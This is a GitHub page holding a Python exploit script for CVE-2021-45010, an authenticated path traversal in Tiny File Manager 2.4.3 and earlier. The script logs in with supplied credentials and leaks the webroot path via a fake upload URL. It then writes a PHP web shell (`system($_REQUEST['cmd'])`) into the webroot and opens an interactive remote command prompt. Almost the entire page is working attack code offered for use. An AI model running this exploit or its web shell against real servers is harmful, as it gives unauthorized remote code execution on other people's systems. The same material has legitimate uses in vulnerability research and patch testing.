-
Notifications
You must be signed in to change notification settings - Fork 17
/
Copy pathtiny_file_manager_exploit.py
113 lines (91 loc) · 4.08 KB
/
tiny_file_manager_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
# Exploit Title: Tiny File Manager <= 2.4.3 Remote Code Execution (Authenticated)
# Date: 14/03/2022
# Exploit Author: FEBIN MON SAJI
# Vendor Home Page: https://tinyfilemanager.github.io/
# Software Link: https://github.com/prasathmani/tinyfilemanager
# Version: Tiny File Manager <= 2.4.3
# Tested on: Ubuntu 20.04
# CVE : CVE-2021-45010
# Reference: https://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/
# Vulnerability Description: A Path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager Project’s Tiny File Manager <= 2.4.3 allows remote attackers with valid user accounts to upload malicious PHP files to the webroot and achieve code execution on the target server.
import os
import requests
import sys
import random
import readline
def banner():
print(f"""
CVE-2021-45010: Tiny File Manager <= 2.4.3 Authenticated RCE Exploit.
Vulnerability discovered by Febin
Exploit Author: FEBIN
""")
def help():
print(f"""
python3 {sys.argv[0]} <URL> <Admin Username> <Password>
Example: python3 {sys.argv[0]} http://files.ubuntu.local/index.php admin admin@123
""")
banner()
if len(sys.argv) == 4:
if sys.argv[1].startswith("http://"):
try:
creds = {"fm_usr":f"{str(sys.argv[2])}","fm_pwd":f"{str(sys.argv[3])}"}
header={"Cookie":"filemanager=abcdefghijklmnopqrstuvwzxz","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"}
req=requests.post(str(sys.argv[1]), data=creds, headers=header)
cookie="filemanager=abcdefghijklmnopqrstuvwzxz"
header1 = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8","Cookie":"filemanager=abcdefghijklmnopqrstuvwzxz","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"}
#Leak webroot Path
print("[+] Leak in the webroot direcory path to upload shell.")
payload={"type":"upload","uploadurl":"http://sjlkjnaljsnkjsnlakjsnakjs.dhdhdhdhllk/","ajax":"true"}
leak=requests.post(str(sys.argv[1])+"?p=&upload", data=payload, headers=header1)
error_msg = eval(leak.text.replace("\\",""))
path=error_msg["fail"]["file"]
dir_path=path.split("/")[:-1]
dir_path.remove("")
fullpath=""
for i in dir_path:
append = "/"+i
fullpath+=append
print("[+] WEBROOT found: ",fullpath)
filename = "pwn_" + str(hash(random.random())) + ".php"
print(f"[+] Trying to upload {filename} to {fullpath} directory...")
datas={"p":"","fullpath":f"../../../../../../../{fullpath}/{filename}"}
files={"file":("feb.php","<?php system($_REQUEST['cmd']); ?>","application/x-php")}
header={"Cookie":cookie,"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"}
upload=requests.post(sys.argv[1],data=datas, files=files, headers=header)
print(upload.text)
success=eval(upload.text)
host=str(sys.argv[1]).replace("http://","").split("/")[0]
if success["info"] == "file upload successful":
print("[+] Got Success response. Files seems to be uploaded successfully.")
print(f"[+] Try to access the shell at {'http://'+host+'/'+filename}")
shell=requests.get('http://'+host+'/'+filename)
if shell.status_code == 200:
print(f"[+]Shell Found {'http://'+host+'/'+filename}.")
print("")
print("'exit' to quit from shell.")
print("")
while True:
cnc = input("sh31l$> ")
if cnc == "exit" or cnc == "quit":
print("[+] Attempting to cleanup...")
cleanup = requests.post('http://'+host+'/'+filename,data={"cmd":f"rm -f {fullpath}/{filename}"})
sys.exit()
else:
cmd = {"cmd":str(cnc)}
execute = requests.post('http://'+host+'/'+filename, data=cmd)
print(execute.text)
else:
print("[-] File not uploaded...")
sys.exit()
else:
print("[-] No Success response. Files does not seem to be uploaded successfully.")
print("Exiting...")
exit()
except SystemExit:
print("Exited.")
except:
print("Something went wrong! Valid URL? Lost Connectivity? User Interrupt(ctrl+c)?")
else:
print("That doesn't seem like a URL!")
else:
help()